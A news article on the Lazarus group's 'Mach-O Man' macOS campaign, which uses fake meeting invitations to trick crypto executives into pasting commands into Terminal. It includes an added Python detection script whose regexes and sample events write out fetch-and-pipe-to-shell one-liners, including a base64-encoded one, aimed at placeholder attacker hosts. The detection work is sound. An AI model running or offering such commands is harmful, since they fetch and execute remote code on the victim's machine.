North Korean group Lazarus targets crypto operations with new macOS malware

North Korean group Lazarus is using the “Mach-O Man” macOS malware and fake meeting invitations to compromise crypto executives, and is linked to a nine-figure DeFi attack.
Summary
- CertiK has flagged “Mach-O Man,” a Lazarus-built toolkit for macOS that targets crypto and fintech executives.
- The campaign uses fake ClickFix-style meeting invitations to trick victims into pasting malicious commands into the Terminal.
- Researchers linked Lazarus to more than $500 million stolen from Drift and KelpDAO in recent DeFi raids.
Lazarus, a North Korean government-backed hacking outfit, has launched a new macOS campaign aimed at fintech and crypto executives, according to blockchain security firm CertiK.
The operation, called “Mach-O Man,” combines social engineering and terminal-level payloads to steal sensitive company and crypto data while leaving nothing on disk.
CertiK investigators say the campaign relies on the ClickFix tactic, in which victims are lured into pasting commands presented as a “fix” or “verify” step directly into the macOS Terminal during a fake support or meeting flow. In this case, the lures arrive as bogus online meeting invitations that “trick victims into pasting malicious repair commands into Mac terminals,” and the toolkit deletes itself after use to frustrate forensics, CertiK’s analysis noted.
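As an added example, not part of CertiK’s or any vendor’s published detections, the following heuristic scans process-execution events for the pattern the ClickFix lure produces: a one-liner run from Terminal that fetches or decodes a payload, pipes it into an interpreter, and removes its traces. The event fields, the `Terminal` app name and the sample telemetry are constructed assumptions.

```python
import re

# Assumption: telemetry records the launching app; ClickFix lures target Terminal.
INTERACTIVE_TERMINALS = {"Terminal"}

# Each indicator is a regex over the full command line.
INDICATORS = {
    # Remote fetch piped straight into an interpreter, e.g. "curl -fsSL URL | bash".
    "fetch_pipe_exec": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python3?|osascript|perl)\b"),
    # Obfuscated payload decoded on the fly and executed.
    "decode_pipe_exec": re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python3?|osascript)\b"),
    # Same-line removal of the dropped script (the "leaves nothing on disk" trait).
    "self_cleanup": re.compile(r"\brm\s+-r?f\b[^;&|]*(\$0|/tmp/|/private/tmp/|/var/folders/)"),
}
# Only these are suspicious on their own; self_cleanup just raises severity.
PRIMARY = {"fetch_pipe_exec", "decode_pipe_exec"}


def classify(cmd: str) -> list[str]:
    """Return the names of all indicators matched by one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def scan(events: list[dict]) -> list[dict]:
    """Alert on Terminal-launched commands hitting a primary indicator.

    Each event is {"app": launching app, "cmd": full command line}.
    """
    alerts = []
    for idx, ev in enumerate(events):
        if ev["app"] not in INTERACTIVE_TERMINALS:
            continue
        hits = classify(ev["cmd"])
        if not PRIMARY & set(hits):
            continue
        severity = "high" if "self_cleanup" in hits else "medium"
        alerts.append({"index": idx, "severity": severity, "indicators": hits})
    return alerts


# Constructed sample telemetry (not from the page); hosts use RFC 2606 example domains.
SAMPLE_EVENTS = [
    {"app": "Terminal", "cmd": "ls -la ~/Documents"},
    {"app": "Terminal", "cmd": "curl -fsSL http://meeting-fix.example/verify | bash; rm -f /tmp/.verify"},
    {"app": "Terminal", "cmd": "echo Y3VybCBodHRwOi8vZXZpbC5leGFtcGxlL2Zpeg== | base64 -d | sh"},
    {"app": "Terminal", "cmd": "rm -rf /tmp/build"},  # cleanup alone is benign
    {"app": "Xcode", "cmd": "curl -fsSL https://proxy.example/setup | bash"},  # not pasted into Terminal
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Against the sample events only the second and third are flagged; a bare `rm -rf /tmp/...` or a fetch-and-run from a non-interactive app is left alone to keep developer noise down.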
According to threat intelligence firm SOC Prime, the “Mach-O Man” toolkit is tied to Lazarus’ Famous Chollima wing and is being distributed through compromised Telegram accounts and fake meeting invitations targeting crypto and financial organizations. The toolkit, according to CoinDesk, includes a Mach-O binary designed to profile the host, establish persistence, and exfiltrate system information and browser data using Telegram-based command and control.
Google Cloud’s Mandiant previously described similar macOS campaigns that mix ClickFix with AI-assisted video deepfakes, fake Zoom calls, and hacked messaging accounts to nudge targets into running the attackers’ commands.
“The campaign used a compromised Telegram account, a fake Zoom meeting, and artificial AI assistance to trick victims into issuing commands that lead to a series of macOS infections,” Mandiant researchers wrote.
CertiK researcher Natalie Newson linked the latest “Mach-O Man” wave to a broader Lazarus push that has seen more than $500 million stolen from the DeFi platforms Drift and KelpDAO in just over two weeks.
In those incidents, Lazarus allegedly combined social engineering against the trading firm with a sophisticated cross-chain exploit that allowed the attackers to spend approximately 116,500 rETH and withdraw approximately $292 million.
LayerZero, which provides the bridge infrastructure used by KelpDAO, said North Korea’s Lazarus Group “may be the player” behind the rsETH exploit and blamed the single-point authentication design for enabling cross-chain message forgery.
“Lazarus has been targeting the cryptocurrency ecosystem for years, stealing nearly $2 billion in virtual assets in 2023 and 2024,” security outlet SecurityWeek said, citing previous campaigns powered by ClickFix.
With DeFi already suffering what research outlets are calling its worst month ever for hacks, prediction markets are now effectively pricing in another $100 million-plus exploit this year, underscoring how state-linked attackers like Lazarus have become a persistent threat to crypto.